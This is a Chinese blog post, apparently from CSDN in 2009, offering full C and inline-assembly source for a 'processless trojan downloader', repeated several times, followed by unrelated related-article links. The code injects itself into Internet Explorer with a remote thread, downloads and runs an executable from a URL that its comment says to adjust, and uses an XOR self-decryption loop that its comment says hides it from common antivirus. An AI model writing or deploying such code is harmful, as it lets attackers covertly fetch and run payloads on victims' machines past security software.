一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!

下面是程序的主要思路:

1.获取程序自身路径,启动IE进程

2.获取到IE进程句柄

3.分配内存

4.获取进程映像的地址

5.得到内存镜像大小

6.确定起始基址和内存映像基址的位置

7.写内存,创建线程,写数据

8.建立远程线程并运行,关闭对象

二、下面是源码 ,举例下载迅雷而矣:

view plain copy to clipboard print ?
  1. view plaincopy to clipboardprint?
  2. /*
  3. VC无进程木马下载器
  4. By: Kardinal and 寂寞的狼
  5. 2009.3.10
  6. */
  7. #include <windows.h>
  8. #pragma comment(lib,"user32.lib")
  9. #pragma comment(lib,"kernel32.lib")
  10. //取消这4行的注释,可编译出2K大的文件
  11. //#pragma comment(linker,"/OPT:NOWIN98")
  12. //#pragma comment(linker,"/merge:.data=.text")
  13. //#pragma comment(linker,"/merge:.rdata=.text")
  14. //#pragma comment(linker,"/align:0x200")
  15. #pragma comment(linker,"/ENTRY:decrpt")
  16. #pragma comment(linker,"/subsystem:windows")
  17. #pragma comment(linker,"/BASE:0x13150000")
  18. //动态加载shell32.dll中的ShellExecuteA函数
  19. HINSTANCE  (WINAPI *SHELLRUN)( HWND , LPCTSTR , LPCTSTR , LPCTSTR , LPCTSTR , int );
  20. //动态加载Urlmon.dll中的UrlDownloadToFileA函数
  21. DWORD  (WINAPI *DOWNFILE)( LPCTSTR , LPCTSTR , LPCTSTR , DWORD , LPCTSTR );
  22. //建立远程线程,并运行
  23. HANDLE  (WINAPI *MYINJECT) ( HANDLE , LPSECURITY_ATTRIBUTES,  DWORD ,LPTHREAD_START_ROUTINE,  LPVOID ,  DWORD ,  LPDWORD );
  24. void  decrpt();
  25. HANDLE  processhandle;
  26. DWORD  pid;
  27. HINSTANCE  hshell,hurlmon,hkernel; // HINSTANCE与HMOUDLE是通用
  28. // 注入使用的下载函数
  29. void  download()
  30. {
  31. hshell  = LoadLibrary("Shell32.dll" );
  32. hurlmon = LoadLibrary("urlmon.dll" );
  33. (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA" );
  34. (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA" );
  35. //下载的文件自行调整
  36. DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe" , "C://xunlei.exe" ,0,NULL);
  37. SHELLRUN(0,"open" , "C://xunlei.exe" ,NULL,NULL,5);
  38. ExitProcess(0);
  39. }
  40. void  main()
  41. {
  42. char  iename[MAX_PATH],iepath[MAX_PATH];
  43. ZeroMemory(iename,sizeof (iename));
  44. ZeroMemory(iepath,sizeof (iepath));
  45. // 1.获取程序自身路径,启动IE进程
  46. GetWindowsDirectory(iepath,MAX_PATH);
  47. strncpy(iename,iepath,3);
  48. strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE" );
  49. WinExec(iename,SW_SHOWNORMAL);
  50. Sleep(500);
  51. // 2.得到IE进程句柄
  52. HWND     htemp;
  53. htemp = FindWindow("IEFrame" ,NULL);
  54. GetWindowThreadProcessId(htemp,&pid);
  55. // 3.分配内存
  56. HMODULE  Module;
  57. LPVOID   NewModule;
  58. DWORD    Size;
  59. LPDWORD  lpimagesize;
  60. // 4.进程映像的地址
  61. Module = GetModuleHandle(NULL);
  62. // 5.得到内存镜像大小
  63. _asm
  64. {
  65. push eax;
  66. push ebx;
  67. mov ebx,Module;
  68. mov eax,[ebx+0x3c];
  69. lea eax,[ebx+eax+0x50];
  70. mov eax,[eax]
  71. mov lpimagesize,eax;
  72. pop ebx;
  73. pop eax;
  74. };
  75. Size=(DWORD )lpimagesize;
  76. // 确定起始基址和内存映像基址的位置
  77. NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  78. // 6.写内存,创建线程,写数据
  79. WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
  80. LPTHREAD_START_ROUTINE entrypoint;
  81. __asm
  82. {
  83. push eax;
  84. lea eax,download;
  85. mov entrypoint,eax;
  86. pop eax
  87. }
  88. hkernel=LoadLibrary("KERNEL32.dll" );
  89. (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread" );
  90. MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
  91. // 7.关闭对象
  92. CloseHandle(processhandle);
  93. return ;
  94. } ;
  95. // 解密函数
  96. void  decrpt()
  97. {
  98. HANDLE  myps;
  99. DWORD  oldAttr;
  100. BYTE  shellcode[500];
  101. ZeroMemory(shellcode,sizeof (shellcode));
  102. myps=GetCurrentProcess();
  103. ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
  104. //先把原代码,搬移到变量中保存起来
  105. _asm
  106. {
  107. pushad;
  108. lea esi,download;
  109. lea edi,shellcode;
  110. lea ecx,decrpt;
  111. sub ecx,esi;
  112. en1:
  113. lodsb;
  114. stosb;
  115. dec ecx;
  116. jne en1;
  117. popad;
  118. };
  119. //解密搬回
  120. int  i;
  121. for  (i=1;i<=0xFF;i++)
  122. {
  123. _asm
  124. {
  125. pushad;
  126. lea esi,shellcode;
  127. lea edi,download;
  128. lea ecx,decrpt;
  129. sub ecx,edi;
  130. en2:
  131. lodsb;
  132. mov ebx,i;
  133. xor al,bl;
  134. stosb;
  135. dec ecx;
  136. jne en2;
  137. popad;
  138. };
  139. //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
  140. __try
  141. {
  142. main();
  143. return ;
  144. }
  145. __except(EXCEPTION_EXECUTE_HANDLER)
  146. {
  147. };
  148. }
  149. return ;
  150. }
  151. /*
  152. VC无进程木马下载器
  153. By: Kardinal and 寂寞的狼
  154. 2009.3.10
  155. */
  156. #include <windows.h>
  157. #pragma comment(lib,"user32.lib")
  158. #pragma comment(lib,"kernel32.lib")
  159. //取消这4行的注释,可编译出2K大的文件
  160. //#pragma comment(linker,"/OPT:NOWIN98")
  161. //#pragma comment(linker,"/merge:.data=.text")
  162. //#pragma comment(linker,"/merge:.rdata=.text")
  163. //#pragma comment(linker,"/align:0x200")
  164. #pragma comment(linker,"/ENTRY:decrpt")
  165. #pragma comment(linker,"/subsystem:windows")
  166. #pragma comment(linker,"/BASE:0x13150000")
  167. //动态加载shell32.dll中的ShellExecuteA函数
  168. HINSTANCE  (WINAPI *SHELLRUN)( HWND , LPCTSTR , LPCTSTR , LPCTSTR , LPCTSTR , int );
  169. //动态加载Urlmon.dll中的UrlDownloadToFileA函数
  170. DWORD  (WINAPI *DOWNFILE)( LPCTSTR , LPCTSTR , LPCTSTR , DWORD , LPCTSTR );
  171. //建立远程线程,并运行
  172. HANDLE  (WINAPI *MYINJECT) ( HANDLE , LPSECURITY_ATTRIBUTES,  DWORD ,LPTHREAD_START_ROUTINE,  LPVOID ,  DWORD ,  LPDWORD );
  173. void  decrpt();
  174. HANDLE  processhandle;
  175. DWORD  pid;
  176. HINSTANCE  hshell,hurlmon,hkernel; // HINSTANCE与HMOUDLE是通用
  177. // 注入使用的下载函数
  178. void  download()
  179. {
  180. hshell = LoadLibrary("Shell32.dll" );
  181. hurlmon = LoadLibrary("urlmon.dll" );
  182. (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA" );
  183. (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA" );
  184. //下载的文件自行调整
  185. DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe" , "C://xunlei.exe" ,0,NULL);
  186. SHELLRUN(0,"open" , "C://xunlei.exe" ,NULL,NULL,5);
  187. ExitProcess(0);
  188. }
  189. void  main()
  190. {
  191. char  iename[MAX_PATH],iepath[MAX_PATH];
  192. ZeroMemory(iename,sizeof (iename));
  193. ZeroMemory(iepath,sizeof (iepath));
  194. // 1.获取程序自身路径,启动IE进程
  195. GetWindowsDirectory(iepath,MAX_PATH);
  196. strncpy(iename,iepath,3);
  197. strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE" );
  198. WinExec(iename,SW_SHOWNORMAL);
  199. Sleep(500);
  200. // 2.得到IE进程句柄
  201. HWND  htemp;
  202. htemp = FindWindow("IEFrame" ,NULL);
  203. GetWindowThreadProcessId(htemp,&pid);
  204. // 3.分配内存
  205. HMODULE  Module;
  206. LPVOID  NewModule;
  207. DWORD  Size;
  208. LPDWORD  lpimagesize;
  209. // 4.进程映像的地址
  210. Module = GetModuleHandle(NULL);
  211. // 5.得到内存镜像大小
  212. _asm
  213. {
  214. push eax;
  215. push ebx;
  216. mov ebx,Module;
  217. mov eax,[ebx+0x3c];
  218. lea eax,[ebx+eax+0x50];
  219. mov eax,[eax]
  220. mov lpimagesize,eax;
  221. pop ebx;
  222. pop eax;
  223. };
  224. Size=(DWORD )lpimagesize;
  225. // 确定起始基址和内存映像基址的位置
  226. NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  227. // 6.写内存,创建线程,写数据
  228. WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
  229. LPTHREAD_START_ROUTINE entrypoint;
  230. __asm
  231. {
  232. push eax;
  233. lea eax,download;
  234. mov entrypoint,eax;
  235. pop eax
  236. }
  237. hkernel=LoadLibrary("KERNEL32.dll" );
  238. (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread" );
  239. MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
  240. // 7.关闭对象
  241. CloseHandle(processhandle);
  242. return ;
  243. } ;
  244. // 解密函数
  245. void  decrpt()
  246. {
  247. HANDLE  myps;
  248. DWORD  oldAttr;
  249. BYTE  shellcode[500];
  250. ZeroMemory(shellcode,sizeof (shellcode));
  251. myps=GetCurrentProcess();
  252. ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
  253. //先把原代码,搬移到变量中保存起来
  254. _asm
  255. {
  256. pushad;
  257. lea esi,download;
  258. lea edi,shellcode;
  259. lea ecx,decrpt;
  260. sub ecx,esi;
  261. en1:
  262. lodsb;
  263. stosb;
  264. dec ecx;
  265. jne en1;
  266. popad;
  267. };
  268. //解密搬回
  269. int  i;
  270. for  (i=1;i<=0xFF;i++)
  271. {
  272. _asm
  273. {
  274. pushad;
  275. lea esi,shellcode;
  276. lea edi,download;
  277. lea ecx,decrpt;
  278. sub ecx,edi;
  279. en2:
  280. lodsb;
  281. mov ebx,i;
  282. xor al,bl;
  283. stosb;
  284. dec ecx;
  285. jne en2;
  286. popad;
  287. };
  288. //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
  289. __try
  290. {
  291. main();
  292. return ;
  293. }
  294. __except(EXCEPTION_EXECUTE_HANDLER)
  295. {
  296. };
  297. }
  298. return ;
  299. }

view plaincopy to clipboardprint? /* VC无进程木马下载器 By: Kardinal and 寂寞的狼 2009.3.10 */ #include <windows.h> #pragma comment(lib,"user32.lib") #pragma comment(lib,"kernel32.lib") //取消这4行的注释,可编译出2K大的文件 //#pragma comment(linker,"/OPT:NOWIN98") //#pragma comment(linker,"/merge:.data=.text") //#pragma comment(linker,"/merge:.rdata=.text") //#pragma comment(linker,"/align:0x200") #pragma comment(linker,"/ENTRY:decrpt") #pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/BASE:0x13150000") //动态加载shell32.dll中的ShellExecuteA函数 HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int); //动态加载Urlmon.dll中的UrlDownloadToFileA函数 DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR); //建立远程线程,并运行 HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); void decrpt(); HANDLE processhandle; DWORD pid; HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用 // 注入使用的下载函数 void download() { hshell = LoadLibrary("Shell32.dll"); hurlmon = LoadLibrary("urlmon.dll"); (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA"); (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA"); //下载的文件自行调整 DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL); SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5); ExitProcess(0); } void main() { char iename[MAX_PATH],iepath[MAX_PATH]; ZeroMemory(iename,sizeof(iename)); ZeroMemory(iepath,sizeof(iepath)); // 1.获取程序自身路径,启动IE进程 GetWindowsDirectory(iepath,MAX_PATH); strncpy(iename,iepath,3); strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE"); WinExec(iename,SW_SHOWNORMAL); Sleep(500); // 2.得到IE进程句柄 HWND htemp; htemp = FindWindow("IEFrame",NULL); GetWindowThreadProcessId(htemp,&pid); // 3.分配内存 HMODULE Module; LPVOID NewModule; DWORD Size; LPDWORD lpimagesize; // 4.进程映像的地址 Module = GetModuleHandle(NULL); // 5.得到内存镜像大小 _asm { push eax; push ebx; mov ebx,Module; mov eax,[ebx+0x3c]; lea eax,[ebx+eax+0x50]; mov eax,[eax] mov lpimagesize,eax; pop ebx; pop eax; }; Size=(DWORD)lpimagesize; // 确定起始基址和内存映像基址的位置 NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 6.写内存,创建线程,写数据 WriteProcessMemory(processhandle, NewModule, Module, Size, NULL); LPTHREAD_START_ROUTINE entrypoint; __asm { push eax; lea eax,download; mov entrypoint,eax; pop eax } hkernel=LoadLibrary("KERNEL32.dll"); (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread"); MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行 // 7.关闭对象 CloseHandle(processhandle); return; } ; // 解密函数 void decrpt() { HANDLE myps; DWORD oldAttr; BYTE shellcode[500]; ZeroMemory(shellcode,sizeof(shellcode)); myps=GetCurrentProcess(); ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); //先把原代码,搬移到变量中保存起来 _asm { pushad; lea esi,download; lea edi,shellcode; lea ecx,decrpt; sub ecx,esi; en1: lodsb; stosb; dec ecx; jne en1; popad; }; //解密搬回 int i; for (i=1;i<=0xFF;i++) { _asm { pushad; lea esi,shellcode; lea edi,download; lea ecx,decrpt; sub ecx,edi; en2: lodsb; mov ebx,i; xor al,bl; stosb; dec ecx; jne en2; popad; }; //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. __try { main(); return; } __except(EXCEPTION_EXECUTE_HANDLER) { }; } return; } /* VC无进程木马下载器 By: Kardinal and 寂寞的狼 2009.3.10 */ #include <windows.h> #pragma comment(lib,"user32.lib") #pragma comment(lib,"kernel32.lib") //取消这4行的注释,可编译出2K大的文件 //#pragma comment(linker,"/OPT:NOWIN98") //#pragma comment(linker,"/merge:.data=.text") //#pragma comment(linker,"/merge:.rdata=.text") //#pragma comment(linker,"/align:0x200") #pragma comment(linker,"/ENTRY:decrpt") #pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/BASE:0x13150000") //动态加载shell32.dll中的ShellExecuteA函数 HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int); //动态加载Urlmon.dll中的UrlDownloadToFileA函数 DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR); //建立远程线程,并运行 HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); void decrpt(); HANDLE processhandle; DWORD pid; HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用 // 注入使用的下载函数 void download() { hshell = LoadLibrary("Shell32.dll"); hurlmon = LoadLibrary("urlmon.dll"); (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA"); (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA"); //下载的文件自行调整 DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL); SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5); ExitProcess(0); } void main() { char iename[MAX_PATH],iepath[MAX_PATH]; ZeroMemory(iename,sizeof(iename)); ZeroMemory(iepath,sizeof(iepath)); // 1.获取程序自身路径,启动IE进程 GetWindowsDirectory(iepath,MAX_PATH); strncpy(iename,iepath,3); strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE"); WinExec(iename,SW_SHOWNORMAL); Sleep(500); // 2.得到IE进程句柄 HWND htemp; htemp = FindWindow("IEFrame",NULL); GetWindowThreadProcessId(htemp,&pid); // 3.分配内存 HMODULE Module; LPVOID NewModule; DWORD Size; LPDWORD lpimagesize; // 4.进程映像的地址 Module = GetModuleHandle(NULL); // 5.得到内存镜像大小 _asm { push eax; push ebx; mov ebx,Module; mov eax,[ebx+0x3c]; lea eax,[ebx+eax+0x50]; mov eax,[eax] mov lpimagesize,eax; pop ebx; pop eax; }; Size=(DWORD)lpimagesize; // 确定起始基址和内存映像基址的位置 NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 6.写内存,创建线程,写数据 WriteProcessMemory(processhandle, NewModule, Module, Size, NULL); LPTHREAD_START_ROUTINE entrypoint; __asm { push eax; lea eax,download; mov entrypoint,eax; pop eax } hkernel=LoadLibrary("KERNEL32.dll"); (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread"); MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行 // 7.关闭对象 CloseHandle(processhandle); return; } ; // 解密函数 void decrpt() { HANDLE myps; DWORD oldAttr; BYTE shellcode[500]; ZeroMemory(shellcode,sizeof(shellcode)); myps=GetCurrentProcess(); ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr); //先把原代码,搬移到变量中保存起来 _asm { pushad; lea esi,download; lea edi,shellcode; lea ecx,decrpt; sub ecx,esi; en1: lodsb; stosb; dec ecx; jne en1; popad; }; //解密搬回 int i; for (i=1;i<=0xFF;i++) { _asm { pushad; lea esi,shellcode; lea edi,download; lea ecx,decrpt; sub ecx,edi; en2: lodsb; mov ebx,i; xor al,bl; stosb; dec ecx; jne en2; popad; }; //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒. __try { main(); return; } __except(EXCEPTION_EXECUTE_HANDLER) { }; } return; }

三、工程及源码下载地址:

http://download.csdn.net/source/1546155

http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/

VC无进程木马下载器源码相关推荐

  1. 图解VC++版PE文件解析器源码分析

    该源码下载自 http://download.csdn.net/download/witch_soya/4979587 1 Understand 分析的图表 2 PE结构解析的主要代码简要分析 首先看 ...

  2. 【190302】VC 仿千千静听音乐播放器源码源代码

    源码下载简介 超酷界面的VC++音乐播放器,推荐给大家, 在VC++6.0下顺利编译,它的界面非常 酷,编译中也没有发现用到第三方的界面控件,而且播放器的窗口还具有像千千静听一样的自动吸附功能,也就是 ...

  3. 音乐下载器源码,需要自取

    用Python实现听歌自由 需要源代码私信 导入模块 import os import tkinter as tk import webbrowser import requests import t ...

  4. 2023 诚通网盘在线解析无广告高速下载网站源码

    对于用户来说,上传下载应该是网盘最大的痛点.而上传资源网盘肯定不会做限制,因为上传的资源越多,网盘占的市场份额会越大,所以只能从下载方面入手. 1.所以现在除了阿里外,其他的网盘不付费那就是给你几十K ...

  5. 木马下载器连环出击盗号 “完美时空”帐下《完美世界》《武林外传》《完美世界II》《诛仙》无一幸免(1108)

    木马下载器连环出击盗号  "完美时空"帐下<完美世界><武林外传><完美世界II><诛仙>无一幸免(1108) 备选: 黑客木马猖獗 ...

  6. Discuz论坛web网页mp3音频播放器源码下载

    最近在做一个DZ论坛的搭建,在前几天的时候遇到Flash+Js的幻灯片的问题,特写了一篇<JS+Flash焦点图轮播源代码(2屏,3屏,多屏)>来记录论坛搭建过程遇到的一些技术性问题,以便 ...

  7. C++、VC++、MFC网页自动注册、登陆、发帖、留言,QQ注册、QQ申请器源码、注册邮箱源码、自动发帖源码...

    C++.VC++.MFC网页自动注册.登陆.发帖.留言,QQ注册.QQ申请器源码.注册邮箱源码.自动发帖源码   参考资料: 自动登录yahoo邮箱http://blog.csdn.net/suisu ...

  8. 庖丁解牛分词器---源码下载---错误问题解决

    庖丁解牛分词器---源码下载 地址:http://download.csdn.net/detail/u014737138/9349677 由于国内的环境限制,访问不了Google  ,同时网上那些下载 ...

  9. C、C++、VC、MFC网页自动注册、登陆、发帖、留言 QQ注册、QQ申请器源码、源代码

    查看文章   [转]C.C++.VC.MFC网页自动注册.登陆.发帖.留言 QQ注册.QQ申请器源码.源代码 2012-01-11 10:58 转载自 qq316293804 最终编辑 qq31629 ...

  10. C++、VC++、MFC网页自动注册、登陆、发帖、留言,QQ注册、QQ申请器源码、注册邮箱源码、自动发帖源码

    参考资料: 自动登录yahoo邮箱http://blog.csdn.net/suisuibianbian/archive/2005/12/12/550260.aspx VC采集网页所有表单域http: ...

最新文章

  1. python错了怎么修改密码_如何用python更改windows开机密码?
  2. 090620 T The events of HttpApplication
  3. Luogu 2827 [NOIP2016] 蚯蚓
  4. 约会安排 HDU - 4553
  5. jpa 关联实体的关联实体_JPA实体锁定模式的差异
  6. 阿里云新设浙江猫精人工智能科技有限公司
  7. VC调用Delphi对象接口
  8. [轉]function, new function, new Function
  9. 基于双边滤波的改进型Canny算法边缘检测冠状动脉CT图像
  10. 目前常用的4种备份系统架构
  11. 科技风杂志科技风杂志社科技风编辑部2022年第16期目录
  12. [转帖]江湖高手专用的“隐身术”:图片隐写技术
  13. Latex页眉三种形式设置
  14. 基于C/C++语言的停车场管理系统编程课程设计超详细
  15. 通信网基础作业答案整理
  16. linux vncviewer使用教程,vnc使用教程,vnc使用教程5步详解
  17. 2.网页布局之切切豆腐
  18. 【Java】寒假答辩作品:Java小游戏
  19. WAMP Server Localhost Shows 500 Internal Server Error
  20. 爬取百度贴吧的标题,发帖人,发帖时间

热门文章

  1. Arrays.sort()和lambda表达式
  2. 主板rgb接口是什么_什么是主板?
  3. 分论坛介绍:机器学习、企业数据中台、实验科学与因果推断
  4. ESXI7.0与6.7官网下载地址
  5. 如何在Pr中制作镂空字体?
  6. 计算机有什么简便快捷方法,运行快捷键(电脑常用快捷键大全)
  7. CSS3 文字边框 -webkit-text-stroke
  8. java 树什么意思是什么意思是什么意思_什么是红黑树?看完这篇你就明白了!...
  9. 生活随记 - 2020国庆第三天
  10. 图片中加入超链接html代码,html网页超链接代码 怎样用HTML代码在图片插入超链接...